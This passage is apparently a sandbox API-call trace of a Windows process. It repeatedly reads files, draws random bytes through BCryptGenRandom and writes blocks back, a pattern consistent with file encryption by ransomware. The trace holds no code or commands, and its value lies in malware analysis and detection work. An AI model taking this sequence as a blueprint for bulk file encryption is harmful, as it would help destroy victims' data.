returned 1 [0165.312] CloseHandle (hObject=0x2a8) returned 1 [0165.312] free (_Block=0x1ff1e60) [0165.312] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.322] CloseHandle (hObject=0x3cc) returned 1 [0165.323] free (_Block=0x3d70450) [0165.323] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.333] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xd70, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0165.333] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.340] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xd3c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0165.340] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.350] CloseHandle (hObject=0x2a8) returned 1 [0165.350] free (_Block=0x1ff1e60) [0165.350] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.361] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x1750, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0165.362] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.369] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1540, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.370] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.370] CloseHandle (hObject=0x2a8) returned 1 [0165.370] free (_Block=0x3df0008) [0165.370] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.373] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.374] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0165.374] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.374] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0165.374] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.375] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.375] free (_Block=0x3e305b8) [0165.375] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.375] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.375] free (_Block=0x1fa91d0) [0165.375] free (_Block=0x1fa2ed8) [0165.375] free (_Block=0x1fa90b8) [0165.375] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0165.376] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.377] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0165.377] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.411] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1a6b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.412] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.412] CloseHandle (hObject=0x2a4) returned 1 [0165.412] free (_Block=0x3df0008) [0165.412] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.422] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.422] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.422] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0165.422] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.423] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0165.423] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.423] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.423] free (_Block=0x3e305b8) [0165.423] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.423] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.424] free (_Block=0x1fa91d0) [0165.424] free (_Block=0x1fa2ed8) [0165.424] free (_Block=0x1fa90b8) [0165.424] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.424] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.425] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1960, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.425] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.437] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1652, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.438] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.439] CloseHandle (hObject=0x2a4) returned 1 [0165.439] free (_Block=0x3df0008) [0165.439] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.448] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.448] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0165.448] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.449] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0165.449] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.449] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.449] free (_Block=0x3e305b8) [0165.449] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.449] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.450] free (_Block=0x1fa91d0) [0165.450] free (_Block=0x1fa2ed8) [0165.450] free (_Block=0x1fa90b8) [0165.450] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.451] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2160, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.452] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.452] CloseHandle (hObject=0x2a4) returned 1 [0165.452] free (_Block=0x3df0008) [0165.452] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.465] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.465] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0165.466] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.466] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0165.466] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.466] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.466] free (_Block=0x3e305b8) [0165.467] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.467] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.467] free (_Block=0x1fa91d0) [0165.467] free (_Block=0x1fa2ed8) [0165.467] free (_Block=0x1fa90b8) [0165.467] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.467] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.468] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x17c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.469] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.481] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1784, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.482] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.482] CloseHandle (hObject=0x2a4) returned 1 [0165.482] free (_Block=0x3df0008) [0165.482] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.490] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.491] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.491] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0165.492] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.492] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.492] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0165.492] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.492] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.492] free (_Block=0x3e305b8) [0165.492] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.492] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.493] free (_Block=0x1fa91d0) [0165.493] free (_Block=0x1fa2ed8) [0165.493] free (_Block=0x1fa90b8) [0165.493] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.493] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.495] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1e60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.495] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.495] CloseHandle (hObject=0x2a4) returned 1 [0165.495] free (_Block=0x3df0008) [0165.495] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.504] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.505] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.505] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0165.505] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.505] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.505] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0165.506] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.506] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.506] free (_Block=0x3e305b8) [0165.506] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.506] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.506] free (_Block=0x1fa91d0) [0165.507] free (_Block=0x1fa2ed8) [0165.507] free (_Block=0x1fa90b8) [0165.507] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.507] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.508] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x19b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.508] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.519] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1cb3, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.520] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.521] CloseHandle (hObject=0x2a4) returned 1 [0165.521] free (_Block=0x3df0008) [0165.521] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.537] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.538] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0165.538] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.538] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0165.539] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.539] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.539] free (_Block=0x3e305b8) [0165.539] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.539] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.539] free (_Block=0x1fa91d0) [0165.539] free (_Block=0x1fa2ed8) [0165.539] free (_Block=0x1fa90b8) [0165.539] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.540] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.541] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1a70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.541] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.552] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1511, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.553] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.553] CloseHandle (hObject=0x2a4) returned 1 [0165.553] free (_Block=0x3df0008) [0165.553] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.596] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.596] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.596] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0165.596] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.597] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0165.597] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.597] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.597] free (_Block=0x3e305b8) [0165.597] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.597] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.598] free (_Block=0x1fa91d0) [0165.598] free (_Block=0x1fa2ed8) [0165.598] free (_Block=0x1fa90b8) [0165.598] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.598] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.254] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x6140, 